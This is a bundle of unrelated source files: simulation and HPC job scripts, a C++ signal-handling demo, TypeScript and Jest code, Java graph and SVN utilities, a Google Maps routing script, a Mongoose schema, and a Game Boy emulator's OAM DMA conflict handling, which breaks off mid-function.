# Prerequisite:- To compile and run simulation, you must compile the Xilinx simulation libraries using the
# 'compile_simlib' TCL command. For more information about this command, run 'compile_simlib -help' in the
# Vivado Tcl Shell. Once the libraries have been compiled successfully, specify the -lib_map_path switch
# that points to these libraries and rerun export_simulation. For more information about this switch please
# type 'export_simulation -help' in the Tcl shell.
#
# You can also point to the simulation libraries by either replacing the <SPECIFY_COMPILED_LIB_PATH> in this
# script with the compiled library directory path or specify this path with the '-lib_map_path' switch when
# executing this script. Please type 'data_mem_256x32.sh -help' for more information.
#
# Additional references - 'Xilinx Vivado Design Suite User Guide:Logic simulation (UG900)'
#
#*********************************************************************************************************
# Script info
# Banner identifying the generating tool and Vivado version.
echo -e "data_mem_256x32.sh - Script generated by export_simulation (Vivado v2019.2 (64-bit)-id)\n"
# Main steps
# Top-level driver: validate the command line, prepare the run area and the
# simulator setup, then execute the compile -> elaborate -> simulate flow.
run()
{
# $# is the number of script arguments forwarded by `run $1 $2` below.
check_args $# $1
setup $1 $2
compile
elaborate
simulate
}
# RUN_STEP: <compile>
compile()
{
# Compile design files
# Output is echoed to the console and appended to compile.log.
source compile.do 2>&1 | tee -a compile.log
}
# RUN_STEP: <elaborate>
elaborate()
{
# Elaborate the design; output mirrored into elaborate.log.
source elaborate.do 2>&1 | tee -a elaborate.log
}
# RUN_STEP: <simulate>
simulate()
{
# Run Questa in 64-bit batch mode (-c), driven by simulate.do.
vsim -64 -c -do "do {simulate.do}" -l simulate.log
}
# STEP: setup
# Dispatch on the first option, then (re)create the library directory.
# $1 -- option string (may be empty), $2 -- option value (may be empty)
setup()
{
case $1 in
"-lib_map_path" )
if [[ ($2 == "") ]]; then
echo -e "ERROR: Simulation library directory path not specified (type \"./data_mem_256x32.sh -help\" for more information)\n"
exit 1
fi
copy_setup_file $2
;;
"-reset_run" )
reset_run
echo -e "INFO: Simulation run files deleted.\n"
exit 0
;;
"-noclean_files" )
# do not remove previous data
;;
* )
# No recognised option: $2 is empty here, so copy_setup_file falls back
# to the library path baked in at export time.
copy_setup_file $2
esac
create_lib_dir
# Add any setup/initialization commands here:-
# <user specific commands>
}
# Copy modelsim.ini file
# $1 -- optional compiled-library directory; when empty, fall back to the
#       path baked in by Vivado at export time.
copy_setup_file()
{
file="modelsim.ini"
if [[ ($1 != "") ]]; then
lib_map_path="$1"
else
lib_map_path="D:/VivadoProject/COD/Lab5/cpu_pipeline_branch_in_ex/cpu_pipeline_branch_in_ex.cache/compile_simlib/questa"
fi
if [[ ($lib_map_path != "") ]]; then
src_file="$lib_map_path/$file"
# Quote the expansion so library paths containing spaces survive word
# splitting (the original unquoted `cp $src_file` broke on such paths).
cp "$src_file" .
fi
}
# Create design library directory
# Always starts from an empty questa_lib directory: any existing one is
# removed before a fresh directory is created.
create_lib_dir()
{
lib_dir="questa_lib"
if [[ -e $lib_dir ]]; then
rm -rf "$lib_dir"
fi
mkdir "$lib_dir"
}
# Delete generated data from the previous run
# Removes logs, the waveform dump and the library directory, then recreates
# an empty library directory.
reset_run()
{
files_to_remove=(compile.log elaborate.log simulate.log vsim.wlf questa_lib)
# Iterate the array directly (quoted) instead of the C-style index loop.
for file in "${files_to_remove[@]}"; do
if [[ -e $file ]]; then
rm -rf "$file"
fi
done
create_lib_dir
}
# Check command line arguments
# $1 -- argument count forwarded from run(), $2 -- the first option string.
check_args()
{
# Exactly one argument that is not a supported switch is an error.
if [[ ($1 == 1 ) && ($2 != "-lib_map_path" && $2 != "-noclean_files" && $2 != "-reset_run" && $2 != "-help" && $2 != "-h") ]]; then
echo -e "ERROR: Unknown option specified '$2' (type \"./data_mem_256x32.sh -help\" for more information)\n"
exit 1
fi
# -help/-h prints usage and exits (usage() never returns).
if [[ ($2 == "-help" || $2 == "-h") ]]; then
usage
fi
}
# Script usage
# Print the usage text and exit with status 1.
usage()
{
msg="Usage: data_mem_256x32.sh [-help]\n\
Usage: data_mem_256x32.sh [-lib_map_path]\n\
Usage: data_mem_256x32.sh [-reset_run]\n\
Usage: data_mem_256x32.sh [-noclean_files]\n\n\
[-help] -- Print help information for this script\n\n\
[-lib_map_path <path>] -- Compiled simulation library directory path. The simulation library is compiled\n\
using the compile_simlib tcl command. Please see 'compile_simlib -help' for more information.\n\n\
[-reset_run] -- Recreate simulator setup files and library mappings for a clean run. The generated files\n\
from the previous run will be removed. If you don't want to remove the simulator generated files, use the\n\
-noclean_files switch.\n\n\
[-noclean_files] -- Reset previous run, but do not remove simulator generated files from the previous run.\n\n"
echo -e $msg
exit 1
}
# Launch script
# NOTE: $1/$2 are intentionally unquoted -- when absent they must expand to
# nothing so run() sees the true argument count in $#.
run $1 $2
|
// http://web.eecs.utk.edu/~huangj/cs360/360/notes/Setjmp/lecture.html
#include <csignal>
#include <sys/types.h> // for kill
#include <unistd.h> // getpid, alarm
#include <iostream>
using namespace std;
int inner, outer;
time_t tStart;
// SIGALRM handler: prints the loops' progress once a second and kills the
// process with SIGKILL once ~4 seconds have elapsed.
// NOTE(review): iostream and time() are not async-signal-safe; this is
// acceptable for a teaching demo but not for production signal handlers.
void signal_handler(int sig)
{
    if(sig == SIGALRM) {
        time_t tElapsed;
        tElapsed = time(0) - tStart;
        cout << tElapsed << " second" << (tElapsed == 1? "": "s");
        cout << ": outer loop = " << outer << "/10000, inner loop = " << inner << "/1000000\n";
        if (tElapsed >= 4) {
            cout <<"signal_handler says \"Die! Die! Die!\" (sending kill signal)\n";
            kill(getpid(), SIGKILL);
        }
        // Re-arm the one-second alarm and re-install the handler (classic
        // System V semantics reset the disposition after delivery).
        alarm(1);
        signal(SIGALRM, signal_handler);
    }
}
int main(int argc, char**argv)
{
    // Install the handler and arm the first one-second alarm before
    // starting the busy loop the handler reports on.
    signal(SIGALRM, signal_handler);
    alarm(1);
    tStart = time(0);
    // Busy-wait so the alarm handler has progress counters to print.
    // NOTE(review): `inner`/`outer` are non-volatile globals read from a
    // signal handler; an optimizing compiler may elide the empty loop.
    for (outer = 0; outer < 10000; outer++) {
        for (inner = 0; inner < 1000000; inner++);
    }
}
|
#!/usr/bin/env bash
#SBATCH --job-name="pegasus_FScuffDiff"
#SBATCH --time=0-240:00:00
#SBATCH --mail-user=jetstream@tgen.org
#SBATCH --mail-type=FAIL
# Run cuffdiff (Control vs Tumor) on two BAM sets, prefix every output file
# with the sample name, then kick off the post-processing scripts.
time=`date +%d-%m-%Y-%H-%M`
beginTime=`date +%s`
machine=`hostname`
echo "### NODE: $machine"
echo "### REF: ${REF}"
echo "### DIRNAME: ${DIRNAME}"
echo "### RUNDIR: ${RUNDIR}"
echo "### CDPATH: ${CUFFDIFFPATH}"
echo "### GTF: ${GTF}"
echo "### MASK: ${MASK}"
echo "### NXT1: ${NXT1}"
echo "### BAM1: ${BAM1}"
echo "### BAM2: ${BAM2}"
echo "TIME:$time starting cuffdiff on ${BAM1} and ${BAM2}"
echo "running first stranded cufflinks options for this RNA"
cd ${DIRNAME}
# Sample name is the run directory name without the _cdDir suffix.
newName=`basename ${DIRNAME}`
newName=${newName/_cdDir/}
# cuffdiff expects comma-separated replicate lists.
BAM1=`sed "s/\s/,/g" <(echo $BAM1)`
BAM2=`sed "s/\s/,/g" <(echo $BAM2)`
${CUFFDIFFPATH}/cuffdiff -p 16 -N -M ${MASK} -b ${REF} --library-type fr-secondstrand -L Control,Tumor ${GTF} ${BAM1} ${BAM2}
if [ $? -eq 0 ] ; then
	# Prefix every cuffdiff output file with the sample name (the previous
	# revision spelled this out as 21 copy-pasted mv commands).
	for outFile in \
		tss_groups.fpkm_tracking isoforms.fpkm_tracking genes.fpkm_tracking cds.fpkm_tracking \
		tss_group_exp.diff splicing.diff promoters.diff isoform_exp.diff gene_exp.diff \
		cds_exp.diff cds.diff \
		isoforms.count_tracking tss_groups.count_tracking cds.count_tracking genes.count_tracking \
		isoforms.read_group_tracking tss_groups.read_group_tracking cds.read_group_tracking genes.read_group_tracking \
		read_groups.info run.info
	do
		mv ${DIRNAME}/${outFile} ${DIRNAME}/${newName}_${outFile}
	done
	echo "starting 3 external scripts"
	${PROCESSCDLISTPATH}/processCuffDiffLists.sh ${DIRNAME}/${newName}_genes.fpkm_tracking ${DIRNAME}/${newName}_gene_exp.diff
	${PROCESSCDLISTPATH}/processCuffDiffLists.sh ${DIRNAME}/${newName}_isoforms.fpkm_tracking ${DIRNAME}/${newName}_isoform_exp.diff
	${CUFFDIFF2VCFPATH}/cuffdiff2vcf.pl ${DIRNAME}/${newName}_gene_exp.diff ${BAM1}
	echo "done with 3 external scripts"
	touch ${DIRNAME}.cuffDiffPass
else
	touch ${DIRNAME}.cuffDiffFail
fi
rm -f ${DIRNAME}.cuffDiffInQueue
# Record the wall-clock runtime in hours:minutes.
endTime=`date +%s`
elapsed=$(( $endTime - $beginTime ))
(( hours=$elapsed/3600 ))
(( mins=$elapsed%3600/60 ))
echo "RUNTIME:CUFFDIFF:$hours:$mins" > ${DIRNAME}.cuffdiff.totalTime
time=`date +%d-%m-%Y-%H-%M`
echo "TIME:$time finished cuffdiff on ${BAM1} and ${BAM2}"
|
/**
 * Lightweight image descriptor that can be hydrated from a plain JSON
 * payload and/or an explicit URL (the explicit URL wins when both are given).
 */
export default class Image {
  url!: string;
  width: number | null = null;

  constructor(jsonObj?: Image | null, url?: string) {
    // Copy fields from the JSON payload first ...
    if (jsonObj) {
      this.url = jsonObj.url;
      this.width = jsonObj.width;
    }
    // ... then let an explicitly supplied URL override it.
    if (url) {
      this.url = url;
    }
  }
}
|
<filename>src/features/tradeHistory/redux/__tests__/helpers-tests.ts
import uuid from 'uuid';
import * as R from 'ramda';
import { ITrade, ISocketServerTrade } from 'shared/types/models';
import moment from 'services/moment';
import { makeDescendDateSortChecker } from 'shared/helpers/test';
import { applyTradesDiff, equalById } from '../helpers';
// Canonical client-side trade fixture (ITrade); the tests below spread this
// object and override `id`/`date` as needed.
const trade: ITrade = {
  exchangeRate: 0.1,
  amount: 0.3,
  date: '2018-10-01T20:56:05.866796Z',
  id: uuid(),
  market: 'zrx_tiox',
  type: 'sell'
};
// Matching raw socket-server trade (ISocketServerTrade); note the different
// field names (executionPrice/tradeTime/tradeId/instrument) and the numeric
// `side` code — presumably maps to 'sell'; TODO confirm against the mapper.
const socketServerTrade: ISocketServerTrade = {
  executionPrice: 0.2,
  amount: 0.4,
  tradeTime: '2018-10-01T20:57:05.866796Z',
  tradeId: uuid(),
  instrument: 'zrx_tiox',
  side: 2
};
describe('applyTradesDiff helper', () => {
  // Distinct ids: both the incoming server trade and the previous trade
  // must survive the merge.
  test('Apply new uniq (by id) trades', () => {
    expect(
      applyTradesDiff([{ ...socketServerTrade, tradeId: uuid() }], [{ ...trade, id: uuid() }])
    ).toHaveLength(2);
  });
  // Same id on both sides: the merge must deduplicate.
  test('Apply not uniq (by id) trades', () => {
    const notUniqId = uuid();
    expect(
      applyTradesDiff([{ ...socketServerTrade, tradeId: notUniqId }], [{ ...trade, id: notUniqId }])
    ).toHaveLength(1);
  });
  test('Apply new empty trades to previous', () => {
    expect(applyTradesDiff([], [{ ...trade }])).toHaveLength(1);
  });
  test('Apply trades to empty previous', () => {
    expect(applyTradesDiff([{ ...socketServerTrade }], [])).toHaveLength(1);
  });
  test('Apply empty to empty', () => {
    expect(applyTradesDiff([], [])).toHaveLength(0);
  });
  test('Check equality by id', () => {
    expect(equalById({ ...trade }, { ...trade })).toBe(true);
  });
  // Shuffled dates in, descending dates out.
  test('Should be descend sorted by date', () => {
    const prevTrades: ITrade[] = R.range(0, 10).map(x => {
      return {
        ...trade,
        id: uuid(),
        date: moment(trade.date).add((Math.random() * 10).toFixed(0), 'd').toISOString(),
      };
    });
    const result = applyTradesDiff([], prevTrades);
    const descendDateSortChecker = makeDescendDateSortChecker<ITrade>('date');
    const isSortedCorrectly = result.every(descendDateSortChecker);
    expect(isSortedCorrectly).toBe(true);
  });
  // The helper caps the merged history at 100 entries.
  test('Result should no more than 100 items length', () => {
    const serverTrades: ISocketServerTrade[] = R.range(0, 103).map(() => ({ ...socketServerTrade, tradeId: uuid() }));
    expect(applyTradesDiff(serverTrades, [])).toHaveLength(100);
  });
});
|
import re
def detect_grammar_mistakes(sentence):
    """Return *sentence* with known misspellings corrected.

    Currently fixes "pacient" -> "patient" after the article "the"/"The".
    The backreference keeps the article's original capitalisation; the
    previous revision replaced the whole match with a lowercase "the
    patient", which broke sentence-initial "The pacient ...".
    """
    return re.sub(r"([tT]he) pacient", r"\1 patient", sentence)
if __name__ == "__main__":
    # Demo: correct a known misspelling in a sample sentence.
    sentence = "The doctor advise the pacient to take medicine."
    print(detect_grammar_mistakes(sentence))
/*
* (C) Copyright 2003-2018, by <NAME> and Contributors.
*
* JGraphT : a free Java graph-theory library
*
* This program and the accompanying materials are dual-licensed under
* either
*
* (a) the terms of the GNU Lesser General Public License version 2.1
* as published by the Free Software Foundation, or (at your option) any
* later version.
*
* or (per the licensee's choosing)
*
* (b) the terms of the Eclipse Public License v1.0 as published by
* the Eclipse Foundation.
*/
package org.jgrapht.graph;
import org.jgrapht.*;
import org.jgrapht.graph.builder.*;
/**
* A simple graph. A simple graph is an undirected graph for which at most one edge connects any two
* vertices, and loops are not permitted. If you're unsure about simple graphs, see:
* <a href="http://mathworld.wolfram.com/SimpleGraph.html">
* http://mathworld.wolfram.com/SimpleGraph.html</a>.
*
* @param <V> the graph vertex type
* @param <E> the graph edge type
*
*/
public class SimpleGraph<V, E>
extends AbstractBaseGraph<V, E>
{
private static final long serialVersionUID = 4607246833824317836L;
/**
* Creates a new simple graph with the specified edge factory.
*
* @param weighted if true the graph supports edge weights
* @param ef the edge factory of the new graph.
*/
public SimpleGraph(EdgeFactory<V, E> ef, boolean weighted)
{
super(ef, false, false, false, weighted);
}
/**
* Creates a new simple graph with the specified edge factory.
*
* @param ef the edge factory of the new graph.
*/
public SimpleGraph(EdgeFactory<V, E> ef)
{
this(ef, false);
}
/**
* Creates a new simple graph.
*
* @param edgeClass class on which to base factory for edges
*/
public SimpleGraph(Class<? extends E> edgeClass)
{
this(new ClassBasedEdgeFactory<>(edgeClass));
}
/**
* Create a builder for this kind of graph.
*
* @param edgeClass class on which to base factory for edges
* @param <V> the graph vertex type
* @param <E> the graph edge type
* @return a builder for this kind of graph
*/
public static <V, E> GraphBuilder<V, E, ? extends SimpleGraph<V, E>> createBuilder(
Class<? extends E> edgeClass)
{
return new GraphBuilder<>(new SimpleGraph<>(edgeClass));
}
/**
* Create a builder for this kind of graph.
*
* @param ef the edge factory of the new graph
* @param <V> the graph vertex type
* @param <E> the graph edge type
* @return a builder for this kind of graph
*/
public static <V,
E> GraphBuilder<V, E, ? extends SimpleGraph<V, E>> createBuilder(EdgeFactory<V, E> ef)
{
return new GraphBuilder<>(new SimpleGraph<>(ef));
}
}
// End SimpleGraph.java
|
<reponame>lgoldstein/communitychest
/*
*
*/
package net.community.apps.tools.svn.svnsync;
import javax.swing.SwingUtilities;
import net.community.apps.tools.svn.SVNBaseMain;
import net.community.apps.tools.svn.svnsync.resources.ResourcesAnchor;
import net.community.chest.CoVariantReturn;
import net.community.chest.dom.proxy.AbstractXmlProxyConverter;
import net.community.chest.lang.SysPropsEnum;
import net.community.chest.resources.SystemPropertiesResolver;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Aug 19, 2010 11:31:15 AM
*
*/
public final class Main extends SVNBaseMain<ResourcesAnchor,SVNSyncMainFrame> {
    public Main (String... args)
    {
        super(args);
    }
    /*
     * @see net.community.apps.tools.svn.SVNBaseMain#processArgument(net.community.apps.tools.svn.SVNBaseMainFrame, java.lang.String, int, int, java.lang.String[])
     */
    // Parses one command-line option and returns the index of the last
    // argument consumed. Option values may contain system-property
    // placeholders, which are expanded via SystemPropertiesResolver.
    @Override
    protected int processArgument (SVNSyncMainFrame f, String a, int oIndex, int numArgs, String... args)
    {
        int aIndex=oIndex;
        // -t/--target: working-copy (target) location
        if ("-t".equals(a) || "--target".equals(a))
        {
            aIndex++;
            final String    loc=resolveStringArg(a, args, numArgs, aIndex, f.getWCLocation()),
                            eff=SystemPropertiesResolver.SYSTEM.format(loc);
            f.setWCLocation(null, eff, false);
        }
        // -s/--source: synchronization source location
        else if ("-s".equals(a) || "--source".equals(a))
        {
            aIndex++;
            final String    loc=resolveStringArg(a, args, numArgs, aIndex, f.getSynchronizationSource()),
                            eff=SystemPropertiesResolver.SYSTEM.format(loc);
            f.setSynchronizationSource(eff);
        }
        // -c/--confirm: location requiring confirmation (repeatable, but
        // each location may be specified only once)
        else if ("-c".equals(a) || "--confirm".equals(a))
        {
            aIndex++;
            final String    loc=resolveStringArg(a, args, numArgs, aIndex, null);
            if (!f.addConfirmLocation(loc))
                throw new IllegalStateException("Re-specified " + a + " value: " + loc);
        }
        // boolean flags
        else if ("--show-skipped".equals(a))
        {
            f.setShowSkippedTargetsEnabled(true);
        }
        else if ("--skip-props".equals(a))
        {
            f.setPropertiesSyncAllowed(false);
        }
        else if ("--use-merge".equals(a))
        {
            f.setUseMergeForUpdate(true);
        }
        else    // unknown here: delegate to the base class parser
            aIndex = super.processArgument(f, a, oIndex, numArgs, args);
        return aIndex;
    }
    /*
     * @see net.community.apps.common.BaseMain#createMainFrameInstance()
     */
    // Builds the main frame, applies the command-line arguments and falls
    // back to the current user directory as the synchronization source.
    @Override
    @CoVariantReturn
    protected SVNSyncMainFrame createMainFrameInstance () throws Exception
    {
        final SVNSyncMainFrame  f=processMainArgs(new SVNSyncMainFrame(), getMainArguments());
        final String            wcLoc=f.getSynchronizationSource();
        if ((wcLoc == null) || (wcLoc.length() <= 0))
            f.setSynchronizationSource(SysPropsEnum.USERDIR.getPropertyValue());
        return f;
    }
    //////////////////////////////////////////////////////////////////////////
    public static void main (final String[] args)
    {
        // 1st thing we do before any UI startup
        AbstractXmlProxyConverter.setDefaultLoader(ResourcesAnchor.getInstance());
        // Main implements Runnable via its base class; build the UI on the EDT.
        SwingUtilities.invokeLater(new Main(args));
    }
}
|
<reponame>luisitbweb/html<gh_stars>1-10
var map;
var directionsDisplay;
var directionsService = new google.maps.DirectionsService();

// Build the map centered on the default location and hook the directions
// renderer to both the map and the textual instructions panel.
function initialize() {
    var startLatLng = new google.maps.LatLng(-23.5874156, -46.63351890000001);
    var mapOptions = {
        zoom: 15,
        center: startLatLng,
        mapTypeId: google.maps.MapTypeId.ROADMAP
    };
    map = new google.maps.Map(document.getElementById("rota_mapa"), mapOptions);
    directionsDisplay = new google.maps.DirectionsRenderer();
    directionsDisplay.setMap(map);
    // Step-by-step route description is rendered into this element.
    directionsDisplay.setPanel(document.getElementById("trajeto_texto"));
}

initialize();
$("form").submit(function(event) {
event.preventDefault();
var enderecoPartida = $("#endereco_partida").val();
if(enderecoPartida.length == 8 && isNaN(enderecoPartida) == false){
var cep_ini = enderecoPartida.slice(0,5);
var cep_fim = enderecoPartida.slice(5,8);
var enderecoPartida = cep_ini+"-"+cep_fim;
}
var enderecoChegada = "Rua Vergueiro, 3057 - Vila Mariana, São Paulo - SP, 04101-300, Brazil";
var request = { // Novo objeto google.maps.DirectionsRequest, contendo:
origin: enderecoPartida, // origem
destination: enderecoChegada, // destino
travelMode: google.maps.TravelMode.DRIVING // meio de transporte, nesse caso, de carro
};
directionsService.route(request, function(result, status) {
if (status == google.maps.DirectionsStatus.OK) { // Se deu tudo certo
directionsDisplay.setDirections(result); // Renderizamos no mapa o resultado
document.getElementById("trajeto_texto").style.display = "block";
}else{
alert('Rota não encontrada. \nTente um novo CEP ou Endereço.');
initialize();
document.getElementById("trajeto_texto").style.display = "none";
}
});
}); |
<gh_stars>0
const mongoose = require('mongoose');
const Schema = mongoose.Schema;

// A single comment attached to a list; `realuser` references the account
// document while `user`/`username` carry display names.
const commentSchema = new mongoose.Schema({
    user: String,
    realuser: { type: Schema.Types.ObjectId, ref: 'User' },
    list: { type: Schema.Types.ObjectId, ref: 'List' },
    username: String,
    date: { type: Date, default: Date.now },
    description: String,
    // NOTE(review): both counters default to 1 — presumably to avoid a zero
    // denominator in score math; confirm against the ranking code.
    upvote: { type: Number, default: 1 },
    downvote: { type: Number, default: 1 },
});

const Comment = mongoose.model('Comment', commentSchema);

module.exports = Comment;
|
// Doxygen-generated navigation data for the ISendThread class page:
// each entry is [ member name, target page, anchor ]. Do not edit by hand.
var classarmnn_1_1profiling_1_1_i_send_thread =
[
    [ "~ISendThread", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a4e0fb8f587a0f5ef84d28e57cd2b6afe", null ],
    [ "Start", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#ae9429e2efd9a811c148c6b56b635567c", null ],
    [ "Stop", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a7c6c2c7d1aeec305dcae4bc901b0bdca", null ]
];
#! /bin/bash
# Run a batch of simcoevolity simulations and set up the follow-up
# ecoevolity qsub scripts. Works both as a PBS job and interactively.
set -e

if [ -n "$PBS_JOBNAME" ]
then
    if [ -f "${PBS_O_HOME}/.bashrc" ]
    then
        source "${PBS_O_HOME}/.bashrc"
    fi
    cd /gpfs01/home/tcm0036/codiv-sanger-bake-off/scripts/simcoevolity-scripts
else
    # Run from the directory containing this script.
    # Fix: the previous revision escaped the dollar ("\${BASH_SOURCE[0]}"),
    # so dirname received the literal string and the cd was a no-op ".".
    cd "$( dirname "${BASH_SOURCE[0]}" )"
fi

project_dir="../.."
exe_path="${project_dir}/bin/simcoevolity"

if [ ! -x "$exe_path" ]
then
    echo "ERROR: No executable '${exe_path}'."
    echo "       You probably need to run the project setup script."
    exit 1
fi

source "${project_dir}/modules-to-load.sh" >/dev/null 2>&1 || echo "    No modules loaded"

if [ ! -f "${project_dir}/pyenv/bin/activate" ]
then
    echo "ERROR: Python environment \"${project_dir}/pyenv\" does not exist."
    echo "       You probably need to run the project setup script."
    exit 1
fi
source "${project_dir}/pyenv/bin/activate"

# Batch parameters (baked in by the generator).
rng_seed=816640044
number_of_reps=20
locus_size=500
config_path="../../configs/fixed-independent-pairs-05-sites-01000.yml"
prior_config_path="../../configs/pairs-05-sites-01000.yml"
output_dir="../../simulations/fixed-independent-pairs-05-sites-01000-locus-500/batch-816640044"
qsub_set_up_script_path="../set_up_ecoevolity_qsubs.py"

mkdir -p "$output_dir"
# Generate the simulated datasets, then create the qsub scripts for them.
"$exe_path" --seed="$rng_seed" -n "$number_of_reps" -p "$prior_config_path" -l "$locus_size" -o "$output_dir" "$config_path" && "$qsub_set_up_script_path" "$output_dir"
|
#!/bin/bash
#SBATCH --account=def-dkulic
#SBATCH --mem=8000M			# memory per node
#SBATCH --time=23:00:00			# time (DD-HH:MM)
#SBATCH --output=/project/6001934/lingheng/Double_DDPG_Job_output/continuous_RoboschoolAtlasForwardWalk-v1_ddpg_softcopy_epsilon_greedy_seed5_run9_%N-%j.out  # %N for node name, %j for jobID
# Load the toolchain needed by the TensorFlow CPU virtualenv below.
module load qt/5.9.6 python/3.6.3 nixpkgs/16.09 gcc/7.3.0 boost/1.68.0 cuda cudnn
source ~/tf_cpu/bin/activate
# One Double-DDPG training run (seed 5, run 9) with epsilon-greedy
# exploration on the continuous RoboschoolAtlasForwardWalk-v1 environment.
python ./ddpg_discrete_action.py --env RoboschoolAtlasForwardWalk-v1  --random-seed 5  --exploration-strategy epsilon_greedy --summary-dir ../Double_DDPG_Results_no_monitor/continuous/RoboschoolAtlasForwardWalk-v1/ddpg_softcopy_epsilon_greedy_seed5_run9 --continuous-act-space-flag  --double-ddpg-flag
|
<reponame>c-sp/AGE<gh_stars>1-10
//
// Copyright 2021 <NAME>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
#include "age_gb_oam_dma.hpp"
namespace
{
    //! true if the OAM DMA source window lies in work ram (0xC000-0xDFFF)
    bool is_work_ram_dma_source(int oam_dma_src_address)
    {
        return (oam_dma_src_address >= 0xC000) && (oam_dma_src_address < 0xE000);
    }

    //! Does a CPU access to \a address collide with the running OAM DMA?
    bool oam_dma_conflict(uint16_t address, int oam_dma_src_address, const age::gb_device& device)
    {
        // DMG: a conflict occurs whenever the access and the DMA source are
        // on the same bus (both video ram or both not).
        if (!device.cgb_mode())
        {
            return age::is_video_ram(address) == age::is_video_ram(oam_dma_src_address);
        }

        // CGB:
        // using work ram as OAM DMA source will not cause conflicts when
        // accessing the external bus or the video bus:
        //      (gambatte) oamdma/oamdma_srcC000_busypop7FFF_dmg08_out657665AA_cgb04c_out657655AA
        //      (gambatte) oamdma/oamdma_srcC000_busypop9FFF_dmg08_out65765576_cgb04c_out657655AA
        //      (gambatte) oamdma/oamdma_srcC000_busypopBFFF_dmg08_out65766576_cgb04c_out65765576
        //      (gambatte) oamdma/oamdma_srcE000_busypop7FFF_dmg08_out657665AA_cgb04c_outFFFFFFAA
        //      (gambatte) oamdma/oamdma_srcE000_busypop9FFF_dmg08_out65765576_cgb04c_outFFFF55FF
        if (is_work_ram_dma_source(oam_dma_src_address))
        {
            return address >= 0xC000;
        }
        return age::is_video_ram(address) == age::is_video_ram(oam_dma_src_address);
    }

} // namespace
//! Wire up the OAM DMA unit with its collaborators.
//! The DMA register reads back 0x00 on CGB devices and 0xFF on DMG —
//! presumably matching hardware power-up values (TODO confirm).
age::gb_oam_dma::gb_oam_dma(const gb_device& device,
                            const gb_clock&  clock,
                            gb_memory&       memory,
                            gb_events&       events,
                            gb_lcd&          lcd)
    : m_device(device),
      m_clock(clock),
      m_memory(memory),
      m_events(events),
      m_lcd(lcd),
      m_oam_dma_reg(device.is_cgb_device() ? 0x00 : 0xFF)
{
}
//! Intercept a CPU read below OAM while an OAM DMA is running.
//! Returns the byte the CPU actually sees when the read conflicts with the
//! DMA transfer, or -1 when there is no conflict and the regular read
//! should proceed.
age::int16_t age::gb_oam_dma::conflicting_read(uint16_t address)
{
    AGE_ASSERT(address < 0xFE00)
    // no DMA running => no conflict possible
    if (!dma_active())
    {
        return -1;
    }
    // no OAM DMA conflict: regular read
    if (!oam_dma_conflict(address, m_oam_dma_src_address, m_device))
    {
        return -1;
    }
    auto msg = log();
    msg << "OAM DMA read conflict:";
    // by default the CPU sees the byte currently transferred by the DMA
    auto result = m_next_oam_byte;
    // CGB OAM DMA conflict:
    // when work ram is not used as OAM DMA source,
    // reading from CGB work ram at 0xC000 - 0xDFFF will read either always
    // from 0xC000 - 0xCFFF or always from 0xD000 - 0xDFFF,
    // depending on 0xFF46 & 0x10:
    //      (gambatte) oamdma/oamdma_src0000_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_src0000_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_src7F00_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_src7F00_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_srcBF00_busypopDFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_srcBF00_busypopEFFF_dmg08_out65766576_cgb04c_out657655AA
    //      (gambatte) oamdma/oamdma_srcC000_busypopDFFF_dmg08_cgb04c_out65766576
    //      (gambatte) oamdma/oamdma_srcC000_busypopEFFF_dmg08_cgb04c_out65766576
    //      (gambatte) oamdma/oamdma_srcE000_busypopDFFF_dmg08_out65766576_cgb04c_outFFFF55AA
    //      (gambatte) oamdma/oamdma_srcE000_busypopEFFF_dmg08_out65766576_cgb04c_outFFFF55AA
    //
    if (m_device.cgb_mode() && (address >= 0xC000) && !is_work_ram_dma_source(m_oam_dma_src_address))
    {
        // bit 4 of the DMA register selects which work ram bank window is read
        int work_ram_offset = (m_oam_dma_reg & 0x10) ? 0xD000 : 0xC000;
        result              = m_memory.read_byte(work_ram_offset + (address & 0xFFF));
        msg << "\n    * CGB: rewire to work ram at " << log_hex16(work_ram_offset);
    }
    // CGB:
    // OAM DMA VRAM conflicts will replace the next value written to
    // OAM with zero:
    //      (gambatte) oamdma/oamdma_src8000_busypop7FFF_dmg08_out65765576_cgb04c_out65005576
    //      (gambatte) oamdma/oamdma_src8000_busypop9FFF_2_dmg08_out657665FF_cgb04c_out007665FF
    //      (gambatte) oamdma/oamdma_src8000_busypop9FFF_dmg08_out657665AA_cgb04c_out007665AA
    //
    if (m_device.cgb_mode() && is_video_ram(address))
    {
        msg << "\n    * CGB: next write to OAM will be 0x00 (OAM DMA from VRAM)";
        m_override_next_oam_byte = 0;
    }
    // log read conflict
    msg << "\n    * read [" << age::log_hex16(address) << "] == " << age::log_hex8(result);
    return result;
}
//! Intercept a CPU write below OAM while an OAM DMA is running.
//! Returns true when the write conflicts with the DMA transfer and has been
//! fully handled here; false means the regular write should proceed.
bool age::gb_oam_dma::conflicting_write(uint16_t address, uint8_t value)
{
    AGE_ASSERT(address < 0xFE00)
    // no DMA running => no conflict possible
    if (!dma_active())
    {
        return false;
    }
    // no OAM DMA conflict: regular write
    if (!oam_dma_conflict(address, m_oam_dma_src_address, m_device))
    {
        return false;
    }
    auto msg = log();
    msg << "OAM DMA conflict while trying to write [" << log_hex16(address) << "] = " << log_hex8(value);
    // CGB OAM DMA conflict:
    // when work ram is not used as OAM DMA source,
    // writing to CGB work ram at 0xC000 - 0xDFFF will write either always
    // to 0xC000 - 0xCFFF or always to 0xD000 - 0xDFFF,
    // depending on 0xFF46 & 0x10:
